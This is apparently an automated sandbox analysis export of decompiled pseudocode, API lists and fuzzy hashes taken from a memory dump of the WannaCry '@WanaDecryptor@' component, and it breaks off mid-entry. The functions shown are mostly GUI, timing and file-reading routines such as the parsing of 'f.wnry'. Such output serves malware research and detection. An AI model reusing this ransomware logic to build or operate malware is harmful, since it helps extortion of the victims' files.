                                                      Uniqueness Score: -1.00%

                                                      Function 00404C40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E00404C40(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _t24;

				_push(0xffffffff);
				_push(E00413809);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t24;
				_push(__ecx);
				_push(_a4);
				_push(0x89);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(__ecx + 0x64)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0x415a30;
				_push(0x421798);
				_v12 = 3;
				 *((intOrPtr*)(__ecx)) = 0x415ec8;
				L00412DA0();
				 *[fs:0x0] = _v24;
				return __ecx;
			}







                                                      0x00404c40
                                                      0x00404c42
                                                      0x00404c4d
                                                      0x00404c4e
                                                      0x00404c55
                                                      0x00404c5e
                                                      0x00404c5f
                                                      0x00404c64
                                                      0x00404c68
                                                      0x00404c70
                                                      0x00404c7a
                                                      0x00404c7f
                                                      0x00404c86
                                                      0x00404c8d
                                                      0x00404c94
                                                      0x00404c9b
                                                      0x00404ca2
                                                      0x00404ca7
                                                      0x00404cad
                                                      0x00404cba
                                                      0x00404cc4

                                                      APIs
                                                      • #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
                                                      • #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
                                                      • #860.MFC42(00421798), ref: 00404CAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #324#540#860
                                                      • String ID: 0ZA$DZA
                                                      • API String ID: 1048258301-3838179817
                                                      • Opcode ID: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                                      • Instruction ID: 18ed51ee5778a88a9d54698e5e0d11c9dbfb79b85878934ba46accb8ddaa74ae
                                                      • Opcode Fuzzy Hash: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                                      • Instruction Fuzzy Hash: 880169B1644B50DBD311DF09D605BAABBE4FBD1B24F004A1EF1928B790C7BC95488BDA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00408B40 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E00408B40(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t23;
				int _t25;
				intOrPtr _t30;
				int _t38;
				int _t41;
				intOrPtr* _t43;
				int _t45;
				intOrPtr _t47;
				struct HDC__* _t50;
				intOrPtr _t52;

				_push(0xffffffff);
				_push(E0041407B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_t47 = __ecx;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x4166e0;
				_t23 =  *((intOrPtr*)(__ecx + 0x30));
				_t50 = 0;
				_v4 = 1;
				if(_t23 == 0) {
					 *((intOrPtr*)(__ecx + 8)) = 0;
					 *(__ecx + 4) = 0;
				} else {
					_t41 =  *(__ecx + 0x24);
					_t45 =  *(__ecx + 0x20);
					_t25 =  *((intOrPtr*)(__ecx + 0x2c)) - _t41;
					_t38 =  *((intOrPtr*)(__ecx + 0x28)) - _t45;
					_t30 =  *((intOrPtr*)(__ecx + 0x1c));
					if(__ecx != 0) {
						_t50 =  *(__ecx + 4);
					}
					BitBlt( *(_t30 + 4), _t45, _t41, _t38, _t25, _t50, _t45, _t41, 0xcc0020);
					_t23 =  *((intOrPtr*)(_t47 + 0x18));
					if(_t23 != 0) {
						_t23 =  *((intOrPtr*)(_t23 + 4));
						_push(_t23);
						_push( *((intOrPtr*)(_t47 + 4)));
						L00412E48();
					} else {
						_push(_t23);
						_push( *((intOrPtr*)(_t47 + 4)));
						L00412E48();
					}
				}
				_t43 = _t47 + 0x10;
				_v16 = _t43;
				 *_t43 = 0x415c00;
				_v4 = 2;
				L00412D52();
				 *_t43 = 0x415bec;
				_v4 = 0xffffffff;
				L00412E3C();
				 *[fs:0x0] = _v12;
				return _t23;
			}

















                                                      0x00408b40
                                                      0x00408b42
                                                      0x00408b4d
                                                      0x00408b4e
                                                      0x00408b5a
                                                      0x00408b5d
                                                      0x00408b61
                                                      0x00408b67
                                                      0x00408b6a
                                                      0x00408b6e
                                                      0x00408b76
                                                      0x00408bd0
                                                      0x00408bd3
                                                      0x00408b78
                                                      0x00408b78
                                                      0x00408b7e
                                                      0x00408b84
                                                      0x00408b8b
                                                      0x00408b8d
                                                      0x00408b92
                                                      0x00408b94
                                                      0x00408b94
                                                      0x00408ba7
                                                      0x00408bad
                                                      0x00408bb3
                                                      0x00408bc1
                                                      0x00408bc7
                                                      0x00408bc8
                                                      0x00408bc9
                                                      0x00408bb5
                                                      0x00408bb8
                                                      0x00408bb9
                                                      0x00408bba
                                                      0x00408bba
                                                      0x00408bb3
                                                      0x00408bd6
                                                      0x00408bd9
                                                      0x00408bdd
                                                      0x00408be5
                                                      0x00408bea
                                                      0x00408bf1
                                                      0x00408bf7
                                                      0x00408bff
                                                      0x00408c0b
                                                      0x00408c15

                                                      APIs
                                                      • BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
                                                      • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
                                                      • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
                                                      • #640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5785$#2414#640
                                                      • String ID:
                                                      • API String ID: 2719443296-0
                                                      • Opcode ID: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                                      • Instruction ID: 86c9330ab4234590f1f3c164cda9a19739b95e23c8a4d3600225c259667158ab
                                                      • Opcode Fuzzy Hash: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                                      • Instruction Fuzzy Hash: E1215CB5200B419FC324DF1ACA44A67FBE8EB88710F008A1EF59697781D7B8F8458B65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404530 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E00404530(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct HDC__* _v32;
				void* _v36;
				struct tagSIZE _v48;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				int _t21;
				void* _t22;
				intOrPtr _t41;

				_push(0xffffffff);
				_push(E004137C8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_t21 =  *((intOrPtr*)(__ecx + 0x5a));
				if(_t21 == 0) {
					_t21 =  *((intOrPtr*)(__ecx + 0x58));
					if(_t21 != 0) {
						_push(__ecx);
						L00412DEE();
						_t22 = __ecx + 0x48;
						_push(_t22);
						_v8 = 0;
						L00412DCA();
						_t21 = GetTextExtentPoint32A(_v32,  *(__ecx + 0x40),  *( *(__ecx + 0x40) - 8),  &_v48);
						 *((intOrPtr*)(__ecx + 0x50)) = _v64;
						_push(_t22);
						 *((intOrPtr*)(__ecx + 0x54)) = _v60;
						L00412DCA();
						 *((char*)(__ecx + 0x5a)) = 1;
						_v32 = 0xffffffff;
						L00412DE8();
					}
				}
				 *[fs:0x0] = _v12;
				return _t21;
			}














                                                      0x00404536
                                                      0x00404538
                                                      0x0040453d
                                                      0x0040453e
                                                      0x0040454b
                                                      0x00404550
                                                      0x00404552
                                                      0x00404557
                                                      0x0040455a
                                                      0x0040455f
                                                      0x00404564
                                                      0x0040456b
                                                      0x0040456c
                                                      0x00404574
                                                      0x0040458d
                                                      0x0040459b
                                                      0x0040459e
                                                      0x004045a3
                                                      0x004045a6
                                                      0x004045af
                                                      0x004045b3
                                                      0x004045bb
                                                      0x004045c0
                                                      0x00404557
                                                      0x004045c6
                                                      0x004045d0

                                                      APIs
                                                      • #289.MFC42 ref: 0040455F
                                                      • #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                                      • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                                      • #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                                      • #613.MFC42 ref: 004045BB
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#289#613ExtentPoint32Text
                                                      • String ID:
                                                      • API String ID: 888490064-0
                                                      • Opcode ID: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                                      • Instruction ID: e6b376e8f5faa3704f84febb4d8b873e9abde4cd399f019e979504a664a0483f
                                                      • Opcode Fuzzy Hash: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                                      • Instruction Fuzzy Hash: C8119DB5108780AFC310DF18D980B97BBE8EB88714F044A1DF49293681C7B8A845CB22
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406CF0 Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E00406CF0(void* __ecx, intOrPtr _a4) {
				int _v12;
				intOrPtr _v20;
				void* _v28;
				char _v36;
				intOrPtr _v40;
				void* _v48;
				struct HWND__* _t16;
				void* _t21;
				void* _t34;
				intOrPtr _t36;

				_push(0xffffffff);
				_push(E00413E78);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t36;
				_t34 = __ecx;
				_t16 = __ecx + 0x4c0;
				if(_t16 != 0) {
					_t16 =  *(_t16 + 0x20);
				}
				SendMessageA(_t16, 0x445, 0, 0x4000000);
				_push(0);
				_push(_a4);
				L00412F44();
				_v12 = 0;
				_v48 =  &_v36;
				_v40 = E00406DA0;
				SendMessageA( *(_t34 + 0x4e0), 0x449, 2,  &_v48);
				L00412F3E();
				_t21 = E00406DC0(_t34);
				_v12 = 0xffffffff;
				L00412F38();
				 *[fs:0x0] = _v20;
				return _t21;
			}













                                                      0x00406cf6
                                                      0x00406cf8
                                                      0x00406cfd
                                                      0x00406cfe
                                                      0x00406d09
                                                      0x00406d0c
                                                      0x00406d14
                                                      0x00406d16
                                                      0x00406d16
                                                      0x00406d2c
                                                      0x00406d32
                                                      0x00406d34
                                                      0x00406d39
                                                      0x00406d55
                                                      0x00406d5d
                                                      0x00406d61
                                                      0x00406d69
                                                      0x00406d6f
                                                      0x00406d76
                                                      0x00406d7f
                                                      0x00406d87
                                                      0x00406d92
                                                      0x00406d9c

                                                      APIs
                                                      • SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
                                                      • #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,767B20C0), ref: 00406D39
                                                      • SendMessageA.USER32 ref: 00406D69
                                                      • #1979.MFC42 ref: 00406D6F
                                                      • #665.MFC42 ref: 00406D87
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#1979#353#665
                                                      • String ID:
                                                      • API String ID: 3794212480-0
                                                      • Opcode ID: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                                      • Instruction ID: 970bbd2b9484f858b006173e4a833a93101fbe0026f1fdcd253c6fb41473c1ec
                                                      • Opcode Fuzzy Hash: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                                      • Instruction Fuzzy Hash: EA1170B1244701AFD210EF15C942F9BB7E4BF94B14F504A1EF156A72C0C7B8A905CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407DB0 Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E00407DB0(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v100;
				char _v196;
				void* _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr _t26;
				void* _t28;

				 *[fs:0x0] = _t26;
				E00401000( &_v196, 0);
				_t24 = __imp__time;
				_v8 = 0;
				_t14 =  *_t24(0, _t23,  *[fs:0x0], E00413FA6, 0xffffffff);
				_t22 =  *0x4218a0; // 0x0
				_t28 = _t26 - 0xb8 + 4;
				if(_t14 - _t22 < 0x12c) {
					_v36 = 0;
				}
				_v32 = 0;
				L00412B72();
				_t16 = _v28;
				if(_t16 >= 0) {
					_t16 =  *_t24(0);
					_t28 = _t28 + 4;
					 *0x4218a0 = _t16;
				}
				 *0x4218a4 =  *0x4218a4 + 1;
				_v4 = 1;
				L00412C9E();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t16;
			}


















                                                      0x00407dbe
                                                      0x00407dd2
                                                      0x00407dd7
                                                      0x00407ddf
                                                      0x00407dea
                                                      0x00407dec
                                                      0x00407df2
                                                      0x00407dfc
                                                      0x00407dfe
                                                      0x00407dfe
                                                      0x00407e0d
                                                      0x00407e18
                                                      0x00407e1d
                                                      0x00407e26
                                                      0x00407e2a
                                                      0x00407e2c
                                                      0x00407e2f
                                                      0x00407e2f
                                                      0x00407e34
                                                      0x00407e3e
                                                      0x00407e49
                                                      0x00407e52
                                                      0x00407e5d
                                                      0x00407e6a
                                                      0x00407e77

                                                      APIs
                                                        • Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
                                                        • Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039
                                                      • time.MSVCRT ref: 00407DEA
                                                      • #2514.MFC42 ref: 00407E18
                                                      • time.MSVCRT ref: 00407E2A
                                                      • #765.MFC42 ref: 00407E49
                                                      • #641.MFC42 ref: 00407E5D
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: time$#2514#324#567#641#765
                                                      • String ID:
                                                      • API String ID: 3372871541-0
                                                      • Opcode ID: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                                      • Instruction ID: 27345a9b2c1eb8b6f7bb2a745056f56b64ece2280f016bc8de7da71c9126f67a
                                                      • Opcode Fuzzy Hash: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                                      • Instruction Fuzzy Hash: 4C11AD70A097809FE320EF24CA41BDA77E0BB94714F40462EE589872D0EB786445CB97
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004031A0 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E004031A0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t15;
				intOrPtr* _t24;
				intOrPtr* _t25;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(E004135FF);
				_t15 =  *[fs:0x0];
				_push(_t15);
				 *[fs:0x0] = _t30;
				_v20 = __ecx;
				_v4 = 0;
				_t24 = __ecx + 0xec;
				_v16 = _t24;
				 *_t24 = 0x415c00;
				_v4 = 4;
				L00412D52();
				 *_t24 = 0x415bec;
				_t25 = __ecx + 0xe0;
				_v16 = _t25;
				 *_t25 = 0x415c00;
				_v4 = 5;
				L00412D52();
				 *_t25 = 0x415bec;
				_v4 = 1;
				L00412D4C();
				_v4 = 0;
				L00412D3A();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t15;
			}











                                                      0x004031a0
                                                      0x004031a2
                                                      0x004031a7
                                                      0x004031ad
                                                      0x004031ae
                                                      0x004031bc
                                                      0x004031c0
                                                      0x004031c8
                                                      0x004031ce
                                                      0x004031d2
                                                      0x004031da
                                                      0x004031df
                                                      0x004031e4
                                                      0x004031ea
                                                      0x004031f0
                                                      0x004031f4
                                                      0x004031fc
                                                      0x00403201
                                                      0x0040320c
                                                      0x00403212
                                                      0x00403217
                                                      0x0040321f
                                                      0x00403224
                                                      0x0040322b
                                                      0x00403233
                                                      0x0040323e
                                                      0x00403248

                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
                                                      • #616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
                                                      • #693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
                                                      • #641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#616#641#693
                                                      • String ID:
                                                      • API String ID: 1164084425-0
                                                      • Opcode ID: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                                      • Instruction ID: e1576da2e33af18b213473c47bce756763974573e8f92b07b932385a5cbbc76a
                                                      • Opcode Fuzzy Hash: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                                      • Instruction Fuzzy Hash: FF112774108B82CAC300DF19C1413CAFBE8AFA5714F54891FE0A6972A2D7F851998BE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403AF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 73%
                                                      			E00403AF0(void* __edi, void* __ebp) {
				int _v4;
				intOrPtr _v12;
				char _v1252;
				void _v2251;
				char _v2252;
				int _v2256;
				signed int _t43;
				signed char _t44;
				signed int _t52;
				signed int _t58;
				signed int _t75;
				signed int _t78;
				struct _IO_FILE* _t103;
				intOrPtr _t111;
				void* _t113;

				_push(0xffffffff);
				_push(E0041369B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t111;
				_t103 = fopen("f.wnry", "rt");
				_t113 = _t111 - 0x8c4 + 8;
				if(_t103 != 0) {
					E00401E90( &_v1252, __eflags);
					_v4 = 0;
					_t43 = E00402020( &_v1252, 0, E00403810, 0);
					__eflags = _t43;
					if(_t43 != 0) {
						_t44 =  *(_t103 + 0xc);
						_v2256 = 0;
						__eflags = _t44 & 0x00000010;
						if((_t44 & 0x00000010) == 0) {
							while(1) {
								_v2252 = 0;
								memset( &_v2251, 0, 0xf9 << 2);
								asm("stosw");
								asm("stosb");
								_t52 = fgets( &_v2252, 0x3e7, _t103);
								_t113 = _t113 + 0x18;
								__eflags = _t52;
								if(_t52 == 0) {
									break;
								}
								asm("repne scasb");
								_t75 = 0xbadbac;
								__eflags = 0xbadbac;
								if(0xbadbac != 0) {
									while(1) {
										asm("repne scasb");
										_t78 =  !(_t75 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
											goto L10;
										}
										L9:
										asm("repne scasb");
										_t78 =  !(_t78 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xa;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xa) {
											goto L10;
										}
										asm("repne scasb");
										__eflags =  !(_t78 | 0xffffffff) != 1;
										if( !(_t78 | 0xffffffff) != 1) {
											_t58 = E00402650( &_v1252,  &_v2252);
											__eflags = _t58;
											if(_t58 != 0) {
												_t29 =  &_v2256;
												 *_t29 = _v2256 + 1;
												__eflags =  *_t29;
											}
										}
										goto L14;
										L10:
										asm("repne scasb");
										_t75 =  !(_t78 | 0xffffffff) - 1;
										 *((char*)(_t113 + _t75 + 0x13)) = 0;
										asm("repne scasb");
										_t78 =  !(_t75 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
											goto L10;
										}
										goto L9;
									}
								}
								L14:
								__eflags =  *(_t103 + 0xc) & 0x00000010;
								if(( *(_t103 + 0xc) & 0x00000010) == 0) {
									continue;
								}
								break;
							}
						}
						fclose(_t103);
						__eflags = _v2256;
						_t36 = _v2256 > 0;
						__eflags = _t36;
						_v4 = 0xffffffff;
						E00401F30( &_v1252);
						 *[fs:0x0] = _v12;
						return 0 | _t36;
					} else {
						_v4 = 0xffffffff;
						E00401F30( &_v1252);
						__eflags = 0;
						 *[fs:0x0] = _v12;
						return 0;
					}
				} else {
					 *[fs:0x0] = _v12;
					return 0;
				}
			}


















                                                      0x00403af6
                                                      0x00403af8
                                                      0x00403afd
                                                      0x00403afe
                                                      0x00403b1d
                                                      0x00403b21
                                                      0x00403b26
                                                      0x00403b48
                                                      0x00403b5b
                                                      0x00403b62
                                                      0x00403b67
                                                      0x00403b69
                                                      0x00403b9b
                                                      0x00403b9e
                                                      0x00403ba2
                                                      0x00403ba4
                                                      0x00403bb2
                                                      0x00403bbd
                                                      0x00403bc1
                                                      0x00403bc3
                                                      0x00403bc5
                                                      0x00403bd1
                                                      0x00403bd3
                                                      0x00403bd6
                                                      0x00403bd8
                                                      0x00000000
                                                      0x00000000
                                                      0x00403be7
                                                      0x00403beb
                                                      0x00403beb
                                                      0x00403bec
                                                      0x00403bee
                                                      0x00403bf7
                                                      0x00403bfb
                                                      0x00403bfc
                                                      0x00403c01
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c03
                                                      0x00403c0c
                                                      0x00403c10
                                                      0x00403c11
                                                      0x00403c16
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c35
                                                      0x00403c39
                                                      0x00403c3a
                                                      0x00403c48
                                                      0x00403c4d
                                                      0x00403c4f
                                                      0x00403c51
                                                      0x00403c51
                                                      0x00403c51
                                                      0x00403c51
                                                      0x00403c4f
                                                      0x00000000
                                                      0x00403c18
                                                      0x00403c21
                                                      0x00403c25
                                                      0x00403c26
                                                      0x00403bf7
                                                      0x00403bfb
                                                      0x00403bfc
                                                      0x00403c01
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c01
                                                      0x00403bee
                                                      0x00403c55
                                                      0x00403c55
                                                      0x00403c59
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c59
                                                      0x00403c60
                                                      0x00403c62
                                                      0x00403c71
                                                      0x00403c73
                                                      0x00403c73
                                                      0x00403c7f
                                                      0x00403c8a
                                                      0x00403c9a
                                                      0x00403ca7
                                                      0x00403b6b
                                                      0x00403b72
                                                      0x00403b7d
                                                      0x00403b83
                                                      0x00403b8d
                                                      0x00403b9a
                                                      0x00403b9a
                                                      0x00403b28
                                                      0x00403b33
                                                      0x00403b40
                                                      0x00403b40

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: fopen
                                                      • String ID: f.wnry
                                                      • API String ID: 1432627528-2448388194
                                                      • Opcode ID: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                                      • Instruction ID: 4eb239c0cb280e6f7c3b00bdc2b89ffa7a6027cf1f229c631d6900f059da94bf
                                                      • Opcode Fuzzy Hash: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                                      • Instruction Fuzzy Hash: CF410B311087415BE324DF3899417ABBBD4FB80321F144A3EF4E6B22C1DF789A088796
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040B6A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83fileCOMMON
